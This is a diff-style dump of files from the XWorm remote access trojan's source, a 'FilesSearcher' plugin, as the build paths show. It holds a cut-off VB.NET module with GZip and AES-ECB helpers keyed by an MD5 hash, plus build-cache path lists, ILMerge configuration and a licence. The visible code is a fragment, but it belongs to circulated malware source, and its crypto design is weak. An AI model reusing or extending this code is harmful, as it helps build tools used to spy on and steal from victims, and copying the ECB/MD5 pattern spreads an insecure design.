End Using
End Function
Function Compress(ByVal input As Byte()) As Byte()
Using result = New MemoryStream()
Dim lengthBytes = BitConverter.GetBytes(input.Length)
result.Write(lengthBytes, 0, 4)
Using compressionStream = New GZipStream(result, CompressionMode.Compress)
compressionStream.Write(input, 0, input.Length)
compressionStream.Flush()
End Using
Return result.ToArray()
End Using
End Function
Function SB(ByVal s As String) As Byte()
Return System.Text.Encoding.UTF8.GetBytes(s)
End Function
Function BS(ByVal b As Byte()) As String
Return System.Text.Encoding.UTF8.GetString(b)
End Function
Function AES_Encryptor(ByVal input As Byte()) As Byte()
Dim AES_ As New RijndaelManaged
Dim Hash As New MD5CryptoServiceProvider
Try
AES_.Key = Hash.ComputeHash(SB(Settings.KEY))
AES_.Mode = CipherMode.ECB
Dim DESEncrypter As ICryptoTransform = AES_.CreateEncryptor
Dim Buffer As Byte() = input
Return DESEncrypter.TransformFinalBlock(Buffer, 0, Buffer.Length)
Catch ex As Exception
Debug.WriteLine(ex.Message)
End Try
End Function
Function AES_Decryptor(ByVal input As Byte()) As Byte()
Dim AES_ As New RijndaelManaged
Dim Hash As New MD5CryptoServiceProvider
Try
AES_.Key = Hash.ComputeHash(SB(Settings.KEY))
AES_.Mode = CipherMode.ECB
Dim DESDecrypter As ICryptoTransform = AES_.CreateDecryptor
Dim Buffer As Byte() = input
Return DESDecrypter.TransformFinalBlock(Buffer, 0, Buffer.Length)
Catch ex As Exception
Debug.WriteLine(ex.Message)
End Try
End Function
End Module
@@ -0,0 +1,7 @@
' <autogenerated/>
Option Strict Off
Option Explicit On
Imports System
Imports System.Reflection
<Assembly: Global.System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.0", FrameworkDisplayName:=".NET Framework 4")>
@@ -0,0 +1,7 @@
' <autogenerated/>
Option Strict Off
Option Explicit On
Imports System
Imports System.Reflection
<Assembly: Global.System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.8", FrameworkDisplayName:=".NET Framework 4.8")>
@@ -0,0 +1,2 @@
FilesSearcher.dll
DotNetZip.dll
@@ -0,0 +1,79 @@
C:\Users\XCoder\source\repos\FilesSearcher\FilesSearcher\obj\Debug\FilesSearcher.Resources.resources
C:\Users\XCoder\source\repos\FilesSearcher\FilesSearcher\obj\Debug\FilesSearcher.vbproj.GenerateResource.cache
C:\Users\XCoder\source\repos\FilesSearcher\FilesSearcher\obj\Debug\FilesSearcher.vbproj.CoreCompileInputs.cache
C:\Users\XCoder\source\repos\FilesSearcher\FilesSearcher\obj\Debug\FilesSearcher.dll
C:\Users\XCoder\Desktop\XWorm V5.5 Optimized\XWorm V5.5\XWorm V5.5\Dark Worm\Plugins\FilesSearcher\FilesSearcher\obj\Debug\FilesSearcher.Resources.resources
C:\Users\XCoder\Desktop\XWorm V5.5 Optimized\XWorm V5.5\XWorm V5.5\Dark Worm\Plugins\FilesSearcher\FilesSearcher\obj\Debug\FilesSearcher.vbproj.GenerateResource.cache
C:\Users\XCoder\Desktop\XWorm V5.5 Optimized\XWorm V5.5\XWorm V5.5\Dark Worm\Plugins\FilesSearcher\FilesSearcher\obj\Debug\FilesSearcher.vbproj.CoreCompileInputs.cache
C:\Users\XCoder\Desktop\XWorm V5.5 Optimized\XWorm V5.5\XWorm V5.5\Dark Worm\Plugins\FilesSearcher\FilesSearcher\obj\Debug\FilesSearcher.dll
C:\Users\XCoder\Desktop\XWorm V5.5 Optimized\XWorm V5.5\XWorm\Plugins\FilesSearcher\FilesSearcher\obj\Debug\FilesSearcher.vbproj.AssemblyReference.cache
C:\Users\XCoder\Desktop\XWorm V5.5 Optimized\XWorm V5.5\XWorm\Plugins\FilesSearcher\FilesSearcher\obj\Debug\FilesSearcher.Resources.resources
C:\Users\XCoder\Desktop\XWorm V5.5 Optimized\XWorm V5.5\XWorm\Plugins\FilesSearcher\FilesSearcher\obj\Debug\FilesSearcher.vbproj.GenerateResource.cache
C:\Users\XCoder\Desktop\XWorm V5.5 Optimized\XWorm V5.5\XWorm\Plugins\FilesSearcher\FilesSearcher\obj\Debug\FilesSearcher.vbproj.CoreCompileInputs.cache
C:\Users\XCoder\Desktop\XWorm V5.5 Optimized\XWorm V5.5\XWorm\Plugins\FilesSearcher\FilesSearcher\obj\Debug\FilesSearcher.dll
C:\Users\XCoder\Desktop\XWorm V5.6 Optimized\XWorm V5.6\XWorm\Plugins\FilesSearcher\FilesSearcher\obj\Debug\FilesSearcher.vbproj.AssemblyReference.cache
C:\Users\XCoder\Desktop\XWorm V5.6 Optimized\XWorm V5.6\XWorm\Plugins\FilesSearcher\FilesSearcher\obj\Debug\FilesSearcher.Resources.resources
C:\Users\XCoder\Desktop\XWorm V5.6 Optimized\XWorm V5.6\XWorm\Plugins\FilesSearcher\FilesSearcher\obj\Debug\FilesSearcher.vbproj.GenerateResource.cache
C:\Users\XCoder\Desktop\XWorm V5.6 Optimized\XWorm V5.6\XWorm\Plugins\FilesSearcher\FilesSearcher\obj\Debug\FilesSearcher.vbproj.CoreCompileInputs.cache
C:\Users\XCoder\Desktop\XWorm V5.6 Optimized\XWorm V5.6\XWorm\Plugins\FilesSearcher\FilesSearcher\obj\Debug\FilesSearcher.dll
C:\Users\XCoder\Desktop\Programs\XWorm V5.6 Optimized\XWorm V5.6\XWorm\Plugins\FilesSearcher\FilesSearcher\obj\Debug\FilesSearcher.Resources.resources
C:\Users\XCoder\Desktop\Programs\XWorm V5.6 Optimized\XWorm V5.6\XWorm\Plugins\FilesSearcher\FilesSearcher\obj\Debug\FilesSearcher.vbproj.GenerateResource.cache
C:\Users\XCoder\Desktop\Programs\XWorm V5.6 Optimized\XWorm V5.6\XWorm\Plugins\FilesSearcher\FilesSearcher\obj\Debug\FilesSearcher.vbproj.CoreCompileInputs.cache
C:\Users\XCoder\Desktop\Programs\XWorm V5.6 Optimized\XWorm V5.6\XWorm\Plugins\FilesSearcher\FilesSearcher\obj\Debug\FilesSearcher.dll
C:\Users\HP\Desktop\XWorm V5.6 Optimized\XWorm V5.6\XWorm\Plugins\FilesSearcher\FilesSearcher\obj\Debug\FilesSearcher.Resources.resources
C:\Users\HP\Desktop\XWorm V5.6 Optimized\XWorm V5.6\XWorm\Plugins\FilesSearcher\FilesSearcher\obj\Debug\FilesSearcher.vbproj.GenerateResource.cache
C:\Users\HP\Desktop\XWorm V5.6 Optimized\XWorm V5.6\XWorm\Plugins\FilesSearcher\FilesSearcher\obj\Debug\FilesSearcher.vbproj.CoreCompileInputs.cache
C:\Users\HP\Desktop\XWorm V5.6 Optimized\XWorm V5.6\XWorm\Plugins\FilesSearcher\FilesSearcher\obj\Debug\FilesSearcher.dll
C:\Users\HP\Desktop\XWorm V5.6 Optimized\XWorm V5.6\XWorm\Plugins\FilesSearcher\FilesSearcher\obj\Debug\FilesSearcher.vbproj.AssemblyReference.cache
C:\Users\HP\Desktop\XWorm V5.6 Optimized - USER HERE\XWorm V5.6\XWorm\Plugins\FilesSearcher\FilesSearcher\obj\Debug\FilesSearcher.vbproj.AssemblyReference.cache
C:\Users\HP\Desktop\XWorm V5.6 Optimized - USER HERE\XWorm V5.6\XWorm\Plugins\FilesSearcher\FilesSearcher\obj\Debug\FilesSearcher.Resources.resources
C:\Users\HP\Desktop\XWorm V5.6 Optimized - USER HERE\XWorm V5.6\XWorm\Plugins\FilesSearcher\FilesSearcher\obj\Debug\FilesSearcher.vbproj.GenerateResource.cache
C:\Users\HP\Desktop\XWorm V5.6 Optimized - USER HERE\XWorm V5.6\XWorm\Plugins\FilesSearcher\FilesSearcher\obj\Debug\FilesSearcher.vbproj.CoreCompileInputs.cache
C:\Users\HP\Desktop\XWorm V5.6 Optimized - USER HERE\XWorm V5.6\XWorm\Plugins\FilesSearcher\FilesSearcher\obj\Debug\FilesSearcher.dll
C:\Users\Brwa\Desktop\NK\XWorm V6.0 Source Code\XWorm V6.0\Plugins\FilesSearcher\FilesSearcher\obj\Debug\FilesSearcher.Resources.resources
C:\Users\Brwa\Desktop\NK\XWorm V6.0 Source Code\XWorm V6.0\Plugins\FilesSearcher\FilesSearcher\obj\Debug\FilesSearcher.vbproj.GenerateResource.cache
C:\Users\Brwa\Desktop\NK\XWorm V6.0 Source Code\XWorm V6.0\Plugins\FilesSearcher\FilesSearcher\obj\Debug\FilesSearcher.dll
C:\Users\Brwa\Desktop\NK\XWorm V6.0 Source Code\XWorm V6.0\Plugins\FilesSearcher\FilesSearcher\obj\Debug\FilesSearcher.vbprojAssemblyReference.cache
C:\Users\Brwa\Desktop\NK\XWorm V6.0 Source Code\XWorm V6.0 SC\Plugins\FilesSearcher\FilesSearcher\obj\Debug\FilesSearcher.vbprojAssemblyReference.cache
C:\Users\Brwa\Desktop\NK\XWorm V6.0 Source Code\XWorm V6.0 SC\Plugins\FilesSearcher\FilesSearcher\obj\Debug\FilesSearcher.Resources.resources
C:\Users\Brwa\Desktop\NK\XWorm V6.0 Source Code\XWorm V6.0 SC\Plugins\FilesSearcher\FilesSearcher\obj\Debug\FilesSearcher.vbproj.GenerateResource.cache
C:\Users\Brwa\Desktop\NK\XWorm V6.0 Source Code\XWorm V6.0 SC\Plugins\FilesSearcher\FilesSearcher\obj\Debug\FilesSearcher.dll
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery\Plugins\FilesSearcher\FilesSearcher\obj\Debug\FilesSearcher.vbprojAssemblyReference.cache
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery\Plugins\FilesSearcher\FilesSearcher\obj\Debug\FilesSearcher.Resources.resources
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery\Plugins\FilesSearcher\FilesSearcher\obj\Debug\FilesSearcher.vbproj.GenerateResource.cache
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery\Plugins\FilesSearcher\FilesSearcher\obj\Debug\FilesSearcher.dll
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery - Copy\Plugins\FilesSearcher\FilesSearcher\obj\Debug\FilesSearcher.vbprojAssemblyReference.cache
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery - Copy\Plugins\FilesSearcher\FilesSearcher\obj\Debug\FilesSearcher.Resources.resources
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery - Copy\Plugins\FilesSearcher\FilesSearcher\obj\Debug\FilesSearcher.vbproj.GenerateResource.cache
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery - Copy\Plugins\FilesSearcher\FilesSearcher\obj\Debug\FilesSearcher.dll
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery - Fixed RCE - Auto\Plugins\FilesSearcher\FilesSearcher\obj\Debug\FilesSearcher.Resources.resources
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery - Fixed RCE - Auto\Plugins\FilesSearcher\FilesSearcher\obj\Debug\FilesSearcher.vbproj.GenerateResource.cache
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery - Fixed RCE - Auto\Plugins\FilesSearcher\FilesSearcher\obj\Debug\FilesSearcher.dll
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery - Fixed RCE - Auto\Plugins\FilesSearcher\FilesSearcher\obj\Debug\FilesSearcher.vbprojAssemblyReference.cache
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery - Fixed RCE - AutoDatabase\Plugins\FilesSearcher\FilesSearcher\obj\Debug\FilesSearcher.Resources.resources
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery - Fixed RCE - AutoDatabase\Plugins\FilesSearcher\FilesSearcher\obj\Debug\FilesSearcher.vbproj.GenerateResource.cache
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery - Fixed RCE - AutoDatabase\Plugins\FilesSearcher\FilesSearcher\obj\Debug\FilesSearcher.dll
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery - Fixed RCE - AutoDatabase\Plugins\FilesSearcher\FilesSearcher\obj\Debug\FilesSearcher.vbprojAssemblyReference.cache
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery - Fixed RCE - AutoDatabase 2\Plugins\FilesSearcher\FilesSearcher\obj\Debug\FilesSearcher.Resources.resources
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery - Fixed RCE - AutoDatabase 2\Plugins\FilesSearcher\FilesSearcher\obj\Debug\FilesSearcher.vbproj.GenerateResource.cache
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery - Fixed RCE - AutoDatabase 2\Plugins\FilesSearcher\FilesSearcher\obj\Debug\FilesSearcher.dll
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery - Fixed RCE - AutoDatabase 2\Plugins\FilesSearcher\FilesSearcher\obj\Debug\FilesSearcher.vbprojAssemblyReference.cache
C:\Users\Brwa\Desktop\NK\XWorm V6.3 SC Recovery - Fixed RCE - AutoDatabase 2\Plugins\FilesSearcher\FilesSearcher\obj\Debug\FilesSearcher.vbprojAssemblyReference.cache
C:\Users\Brwa\Desktop\NK\XWorm V6.3 SC Recovery - Fixed RCE - AutoDatabase 2\Plugins\FilesSearcher\FilesSearcher\obj\Debug\FilesSearcher.Resources.resources
C:\Users\Brwa\Desktop\NK\XWorm V6.3 SC Recovery - Fixed RCE - AutoDatabase 2\Plugins\FilesSearcher\FilesSearcher\obj\Debug\FilesSearcher.vbproj.GenerateResource.cache
C:\Users\Brwa\Desktop\NK\XWorm V6.3 SC Recovery - Fixed RCE - AutoDatabase 2\Plugins\FilesSearcher\FilesSearcher\obj\Debug\FilesSearcher.dll
C:\Users\byt3d4sh\Desktop\XWorm SRC\Plugins\FilesSearcher\FilesSearcher\obj\Debug\FilesSearcher.vbproj.AssemblyReference.cache
C:\Users\byt3d4sh\Desktop\XWorm SRC\Plugins\FilesSearcher\FilesSearcher\obj\Debug\FilesSearcher.Resources.resources
C:\Users\byt3d4sh\Desktop\XWorm SRC\Plugins\FilesSearcher\FilesSearcher\obj\Debug\FilesSearcher.vbproj.GenerateResource.cache
C:\Users\byt3d4sh\Desktop\XWorm SRC\Plugins\FilesSearcher\FilesSearcher\obj\Debug\FilesSearcher.vbproj.CoreCompileInputs.cache
C:\Users\byt3d4sh\Desktop\XWorm SRC\Plugins\FilesSearcher\FilesSearcher\obj\Debug\FilesSearcher.dll
C:\Users\byt3d4sh\Desktop\Projects\XWorm SRC\Plugins\FilesSearcher\FilesSearcher\obj\Debug\FilesSearcher.vbproj.AssemblyReference.cache
C:\Users\byt3d4sh\Desktop\Projects\XWorm SRC\Plugins\FilesSearcher\FilesSearcher\obj\Debug\FilesSearcher.Resources.resources
C:\Users\byt3d4sh\Desktop\Projects\XWorm SRC\Plugins\FilesSearcher\FilesSearcher\obj\Debug\FilesSearcher.vbproj.GenerateResource.cache
C:\Users\byt3d4sh\Desktop\Projects\XWorm SRC\Plugins\FilesSearcher\FilesSearcher\obj\Debug\FilesSearcher.vbproj.CoreCompileInputs.cache
C:\Users\byt3d4sh\Desktop\Projects\XWorm SRC\Plugins\FilesSearcher\FilesSearcher\obj\Debug\FilesSearcher.dll
C:\Users\byt3d4sh\Desktop\src 2\Plugins\FilesSearcher\FilesSearcher\obj\Debug\FilesSearcher.vbproj.AssemblyReference.cache
C:\Users\byt3d4sh\Desktop\src 2\Plugins\FilesSearcher\FilesSearcher\obj\Debug\FilesSearcher.Resources.resources
C:\Users\byt3d4sh\Desktop\src 2\Plugins\FilesSearcher\FilesSearcher\obj\Debug\FilesSearcher.vbproj.GenerateResource.cache
C:\Users\byt3d4sh\Desktop\src 2\Plugins\FilesSearcher\FilesSearcher\obj\Debug\FilesSearcher.vbproj.CoreCompileInputs.cache
C:\Users\byt3d4sh\Desktop\src 2\Plugins\FilesSearcher\FilesSearcher\obj\Debug\FilesSearcher.dll
@@ -0,0 +1,7 @@
' <autogenerated/>
Option Strict Off
Option Explicit On
Imports System
Imports System.Reflection
<Assembly: Global.System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.0", FrameworkDisplayName:=".NET Framework 4")>
@@ -0,0 +1,7 @@
' <autogenerated/>
Option Strict Off
Option Explicit On
Imports System
Imports System.Reflection
<Assembly: Global.System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.8", FrameworkDisplayName:=".NET Framework 4.8")>
@@ -0,0 +1,2 @@
FilesSearcher.dll
DotNetZip.dll
@@ -0,0 +1 @@
7b42c3c9575ca3d27a75570a5bdeb58b648b297f510d363d565a8ad1dd6ddb62
@@ -0,0 +1,6 @@
C:\Users\byt3d4sh\Desktop\XWorm SRC\Plugins\FilesSearcher\FilesSearcher\obj\Release\FilesSearcher.vbproj.AssemblyReference.cache
C:\Users\byt3d4sh\Desktop\XWorm SRC\Plugins\FilesSearcher\FilesSearcher\obj\Release\FilesSearcher.Resources.resources
C:\Users\byt3d4sh\Desktop\XWorm SRC\Plugins\FilesSearcher\FilesSearcher\obj\Release\FilesSearcher.vbproj.GenerateResource.cache
C:\Users\byt3d4sh\Desktop\XWorm SRC\Plugins\FilesSearcher\FilesSearcher\obj\Release\FilesSearcher.vbproj.CoreCompileInputs.cache
C:\Users\byt3d4sh\Desktop\XWorm SRC\Plugins\FilesSearcher\FilesSearcher\obj\Release\FilesSearcher.dll
C:\Users\byt3d4sh\Desktop\XWorm SRC\Plugins\FilesSearcher\FilesSearcher\obj\Release\FilesSearcher.pdb
@@ -0,0 +1,5 @@
<?xml version="1.0" encoding="utf-8"?>
<packages>
<package id="ILMerge" version="3.0.29" targetFramework="net40" requireReinstallation="true" />
<package id="MSBuild.ILMerge.Task" version="1.1.3" targetFramework="net40" />
</packages>
Binary file not shown.

After

Width:  |  Height:  |  Size: 2.3 KiB

@@ -0,0 +1,21 @@
The MIT License (MIT)
Copyright (c) 2013-2016 Alexander Nosenko
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
@@ -0,0 +1,11 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- try to import project-specific settings; also use fixed name that was injected into project by NuGet -->
<PropertyGroup>
<!-- at this point only MSBuild* property are available -->
<MSBuildIlMerge1>$(MSBuildProjectDirectory)\$(MSBuildProjectName).ILMerge.props</MSBuildIlMerge1>
<MSBuildIlMerge2>$(MSBuildProjectDirectory)\ILMerge.props</MSBuildIlMerge2>
</PropertyGroup>
<Import Project="$(MSBuildIlMerge1)" Condition="Exists($(MSBuildIlMerge1))"/>
<Import Project="$(MSBuildIlMerge2)" Condition="Exists($(MSBuildIlMerge2))"/>
</Project>
@@ -0,0 +1,116 @@
<?xml version="1.0" encoding="utf-8" ?>
<Project ToolsVersion="4.0" DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup>
<!-- give project-specific settings reasonable defaults -->
<ILMergePackagesPath Condition=" $(ILMergePackagePath) == '' ">$(SolutionDir)packages</ILMergePackagesPath>
<ILMergeOrderFile Condition=" $(ILMergeOrderFile) == '' ">$(MSBuildProjectDirectory)\ILMergeOrder.txt</ILMergeOrderFile>
<ILMergeKeyFile Condition=" $(ILMergeKeyFile) == '' ">$(AssemblyOriginatorKeyFile)</ILMergeKeyFile>
<ILMergeAssemblyVersion Condition=" $(ILMergeAssemblyVersion) == '' "></ILMergeAssemblyVersion>
<ILMergeAllowDuplicateType Condition=" $(ILMergeAllowDuplicateType) == '' "></ILMergeAllowDuplicateType>
<ILMergeAllowMultipleAssemblyLevelAttributes Condition=" $(ILMergeAllowMultipleAssemblyLevelAttributes) == '' ">false</ILMergeAllowMultipleAssemblyLevelAttributes>
<ILMergeAllowZeroPeKind Condition=" $(ILMergeAllowZeroPeKind) == '' ">false</ILMergeAllowZeroPeKind>
<ILMergeCopyAttributes Condition=" $(ILMergeCopyAttributes) == '' ">false</ILMergeCopyAttributes>
<ILMergeDebugInfo Condition=" $(ILMergeDebugInfo) == '' ">true</ILMergeDebugInfo>
<ILMergeDelaySign Condition=" $(ILMergeDelaySign) == '' ">false</ILMergeDelaySign>
<ILMergeFileAlignment Condition=" $(ILMergeFileAlignment) == '' ">512</ILMergeFileAlignment>
<ILMergeInternalize Condition=" $(ILMergeInternalize) == '' ">false</ILMergeInternalize>
<ILMergeInternalizeExcludeFile Condition=" $(ILMergeInternalizeExcludeFile) == '' "></ILMergeInternalizeExcludeFile>
<ILMergeXmlDocumentation Condition=" $(ILMergeXmlDocumentation) == '' ">false</ILMergeXmlDocumentation>
<ILMergePublicKeyTokens Condition=" $(ILMergePublicKeyTokens) == '' ">true</ILMergePublicKeyTokens>
<ILMergeShouldLog Condition=" $(ILMergeShouldLog) == '' ">true</ILMergeShouldLog>
<!--<ILMergeTargetKind Condition=" $(ILMergeTargetKind) == '' "></ILMergeTargetKind>-->
<ILMergeUnionMerge Condition=" $(ILMergeUnionMerge) == '' ">false</ILMergeUnionMerge>
<ILTargetPlatform Condition=" $(ILTargetPlatform) == '' ">40</ILTargetPlatform>
<!--<ILMergeVersion Condition=" $(ILMergeVersion) == '' "></ILMergeVersion>-->
<ILMergeToolsPath Condition=" $(ILMergeToolsPath) == '' ">$(MSBuildThisFileDirectory)..\tools\</ILMergeToolsPath>
</PropertyGroup>
<!-- decide what goes into output after compile-->
<Target Name="SaveILMergeData" AfterTargets="CoreCompile">
<Message Text="Transitive merge" Importance="high" Condition="$(ILMergeTransitive) == 'true'" />
<!-- all copy local assemblies referenced from this project that go to the executable except the main one-->
<CreateItem Include="@(ReferencePath)" Condition=" '%(CopyLocal)' == 'true' ">
<Output TaskParameter="Include" ItemName="MergedAssemblies"/>
</CreateItem>
<!-- all copy local dependency assemblies-->
<CreateItem Include="@(ReferenceDependencyPaths)" Condition=" '%(CopyLocal)' == 'true' ">
<Output TaskParameter="Include" ItemName="MergedDependencies"/>
</CreateItem>
<!-- all assemblies that doesn't so we use their directories as library path -->
<CreateItem Include="@(ReferencePath)" Condition=" '%(CopyLocal)' == 'false' ">
<Output TaskParameter="Include" ItemName="UnmergedAssemblies"/>
</CreateItem>
<!-- all content items marked as copy always or newest -->
<CreateItem Include="@(Content)" Condition=" '%(Content.CopyToOutputDirectory)' == 'Always' OR '%(Content.CopyToOutputDirectory)' == 'PreserveNewest' ">
<Output TaskParameter="Include" ItemName="LocalContentFiles"/>
</CreateItem>
<!-- add the main assembly as the first one -->
<PropertyGroup Condition=" $(ILMergeTransitive) == 'true' ">
<MergedAssemblies>@(IntermediateAssembly->'%(FullPath)');@(MergedAssemblies->'%(FullPath)');@(MergedDependencies->'%(FullPath)')</MergedAssemblies>
</PropertyGroup>
<PropertyGroup Condition=" $(ILMergeTransitive) == 'false' OR $(ILMergeTransitive) == '' ">
<MergedAssemblies>@(IntermediateAssembly->'%(FullPath)');@(MergedAssemblies->'%(FullPath)')</MergedAssemblies>
</PropertyGroup>
<PropertyGroup>
<!-- Ideally we should copy all not-copy-local assemblies that are not in the ILMergeLibraryPath to -->
<!-- a temp directory and add it to the start search path, but we keep it simple here -->
<UnmergedAssemblies>@(UnmergedAssemblies->'%(FullPath)')</UnmergedAssemblies>
<MergeOutputFile>$(TargetPath)</MergeOutputFile>
</PropertyGroup>
</Target>
<!-- do not copy copy-local assemblies, they will be merged -->
<Target Name="_CopyFilesMarkedCopyLocal" />
<!-- override standard target our own merge-and-copy-content -->
<Target Name="CopyFilesToOutputDirectory">
<Message Text="Merge PDBs: $(ILMergeDebugInfo)" Importance="high" />
<Message Text="Merged assemblies: $(MergedAssemblies)" Importance="high" />
<Message Text="Not merged assemblies: $(UnmergedAssemblies)" Importance="normal" />
<Message Text="Merged Output in: $(MergeOutputFile)" Importance="normal" />
<Message Text="Key file: $(ILMergeKeyFile)" Importance="normal" />
<Message Text="Libraries in: $(ILMergeLibraryPath)" Importance="normal" />
<Message Text="Packages in: $(ILMergePackagesPath)" Importance="normal" />
<Message Text="Merge order file: $(ILMergeOrderFile)" Importance="normal" />
<Message Text="Internalization enabled: $(ILMergeInternalize)" Importance="normal" />
<Message Text="Local content: @(LocalContentFiles)" Importance="low" />
<!-- run ILMerge -->
<!-- not supported: AllowWildCards, Closed (use $Transitive instead), TargetKind (default), -->
<MSBuild.ILMerge.Task
KeyFile="$(ILMergeKeyFile)"
OutputFile="$(MergeOutputFile)"
LibraryPath="$(ILMergeLibraryPath)"
InputAssemblies="$(MergedAssemblies)"
LibraryAssemblies="$(UnmergedAssemblies)"
PackagesDir="$(ILMergePackagesPath)"
MergeOrderFile="$(ILMergeOrderFile)"
AllowDuplicateType="$(ILMergeAllowDuplicateType)"
AllowMultipleAssemblyLevelAttributes="$(ILMergeAllowMultipleAssemblyLevelAttributes)"
AllowZeroPeKind="$(ILMergeAllowZeroPeKind)"
CopyAttributes="$(ILMergeCopyAttributes)"
DebugInfo="$(ILMergeDebugInfo)"
DelaySign="$(ILMergeDelaySign)"
FileAlignment="$(ILMergeFileAlignment)"
Internalize="$(ILMergeInternalize)"
InternalizeExcludeFile ="$(ILMergeInternalizeExcludeFile)"
XmlDocumentation="$(ILMergeXmlDocumentation)"
PublicKeyTokens="$(ILMergePublicKeyTokens)"
ShouldLog="$(ILMergeShouldLog)"
TargetPlatform="$(ILTargetPlatform)"
UnionMerge="$(ILUnionMerge)" />
<!-- copy content files marked as copy always or newest -->
<Copy SourceFiles="@(LocalContentFiles)" DestinationFolder="$(OutputPath)" />
<!-- copy config file (???) -->
<CallTarget Targets="_CopyAppConfigFile" Condition="'%(IntermediateAssembly.Extension)' == '.exe'"/>
</Target>
<UsingTask AssemblyFile="$(ILMergeToolsPath)MSBuild.ILMerge.Task.dll" TaskName="MSBuild.ILMerge.Task" />
</Project>
@@ -0,0 +1,67 @@
<?xml version="1.0" encoding="utf-8" ?>
<Project ToolsVersion="4.0" DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup>
<!-- -->
<!-- ILMerge project-specific settings. Almost never need to be set explicitly. -->
<!-- for details, see http://research.microsoft.com/en-us/people/mbarnett/ilmerge.aspx -->
<!-- -->
<!-- *** set this file to Type=None, CopyToOutput=Never *** -->
<!-- If True, all copy local dependencies will also be merged from referenced projects whether they are referenced in the current project explicitly or not -->
<ILMergeTransitive>true</ILMergeTransitive>
<!-- Extra ILMerge library paths (semicolon-separated). Dont put your package dependencies here, they will be added automagically -->
<ILMergeLibraryPath></ILMergeLibraryPath>
<!-- The solution NuGet package directory if not standard 'SOLUTION\packages' -->
<ILMergePackagesPath></ILMergePackagesPath>
<!-- The merge order file name if differs from standard 'ILMergeOrder.txt' -->
<ILMergeOrderFile></ILMergeOrderFile>
<!-- The strong key file name if not specified in the project -->
<ILMergeKeyFile></ILMergeKeyFile>
<!-- The assembly version if differs for the version of the main assembly -->
<ILMergeAssemblyVersion></ILMergeAssemblyVersion>
<!-- added in Version 1.0.4 -->
<ILMergeFileAlignment></ILMergeFileAlignment>
<!-- added in Version 1.0.4, default=none -->
<ILMergeAllowDuplicateType></ILMergeAllowDuplicateType>
<!-- If the <see cref="CopyAttributes"/> is also set, any assembly-level attributes names that have the same type are copied over into the target assembly -->
<ILMergeAllowMultipleAssemblyLevelAttributes></ILMergeAllowMultipleAssemblyLevelAttributes>
<!-- See ILMerge documentation -->
<ILMergeAllowZeroPeKind></ILMergeAllowZeroPeKind>
<!-- The assembly level attributes of each input assembly are copied over into the target assembly -->
<ILMergeCopyAttributes></ILMergeCopyAttributes>
<!-- Creates a .pdb file for the output assembly and merges into it any .pdb files found for input assemblies, default=true -->
<ILMergeDebugInfo></ILMergeDebugInfo>
<!-- Target assembly will be delay signed -->
<ILMergeDelaySign></ILMergeDelaySign>
<!-- Types in assemblies other than the primary assembly have their visibility modified -->
<ILMergeInternalize></ILMergeInternalize>
<!-- The path name of the file that will be used to identify types that are not to have their visibility modified -->
<ILMergeInternalizeExcludeFile></ILMergeInternalizeExcludeFile>
<!-- XML documentation files are merged to produce an XML documentation file for the target assembly -->
<ILMergeXmlDocumentation></ILMergeXmlDocumentation>
<!-- External assembly references in the manifest of the target assembly will use full public keys (false) or public key tokens (true, default value) -->
<ILMergePublicKeyTokens></ILMergePublicKeyTokens>
<!-- Types with the same name are all merged into a single type in the target assembly -->
<ILMergeUnionMerge></ILMergeUnionMerge>
<!-- The version of the target framework, default 40 (works for 45 too) -->
<ILTargetPlatform></ILTargetPlatform>
</PropertyGroup>
</Project>
@@ -0,0 +1,4 @@
# this file contains the partial list of the merged assemblies in the merge order
# you can fill it from the obj\CONFIG\PROJECT.ilmerge generated on every build
# and finetune merge order to your satisfaction